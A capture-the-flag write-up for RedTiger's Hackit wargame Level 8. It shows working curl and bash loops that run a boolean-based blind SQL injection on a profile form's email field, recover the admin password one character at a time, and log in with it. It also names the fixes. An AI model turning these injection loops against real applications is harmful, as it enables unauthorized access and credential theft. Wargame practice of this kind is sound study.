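# RedTiger's Hackit wargame: Level 8

Transcript of a boolean-based blind SQL injection against the profile form's `email` field. The loops below treat a `1` on the returned `email` line as "condition true", which is consistent with the submitted value being concatenated unescaped into the SQL statement (the server code is not shown). The recovered `password` value is accepted by the login form as-is, so the application keeps passwords in recoverable form. Bound parameters for the profile update and salted password hashing would close both gaps.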


# curl --silent --insecure --cookie-jar level8 --cookie level8 --request POST --data "password=4d4f4f636f774d454f57636174&level8login=Login" https://redtiger.dyndns.org/hackit/level8.php
                <b>Welcome to Level 8</b><br><br>
                Target: Get the password of the admin.<br><br><br>

                Username: Admin<br>
                <form method="POST">
                        Email: <input type="text" name="email" value="hans@localhost"> <br>
                        Name: <input type="text" name="name" value="Hans"> <br>
                        ICQ: <input type="text" name="icq" value="12345"> <br>
                        Age: <input type="text" name="age" value="25"> <br>
                        <input type="submit" name="edit" value="Edit">
                </form>
                                <br><br><br>
                        <form method="post">
                                Username: <input type="text" name="user"><br>
                                Password: <input type="text" name="password">
                                <input type="submit" name="login" value="Login">
                        </form>
                        <br>
# for i in `seq 1 20`; do email="' or length(password)='$i"; result=`curl --silent --insecure --cookie level8 --request POST --data "email=$email&edit=Edit" https://redtiger.dyndns.org/hackit/level8.php | grep email | grep 1`; if [ "$result" != "" ]; then echo $i; break; fi; done
18
# for i in `seq 1 18`; do for j in `echo {a..z} {0..9}`; do email="' or left(right(password,$[19-$i]),1)='$j"; result=`curl --silent --insecure --cookie level8 --request POST --data "email=$email&edit=Edit" https://redtiger.dyndns.org/hackit/level8.php | grep email | grep 1`; if [ "$result" != "" ]; then echo -n "$j"; break; fi; done; done; echo
7468656d65616e696e676f666c6966653432
# curl --silent --insecure --cookie level8 --request POST --data "user=Admin&password=7468656d65616e696e676f666c6966653432&login=Login" https://redtiger.dyndns.org/hackit/level8.php | grep is:
<br>The password for the next level is: <b>736c61705f7468655f6c616d65727a</b> <br><br>
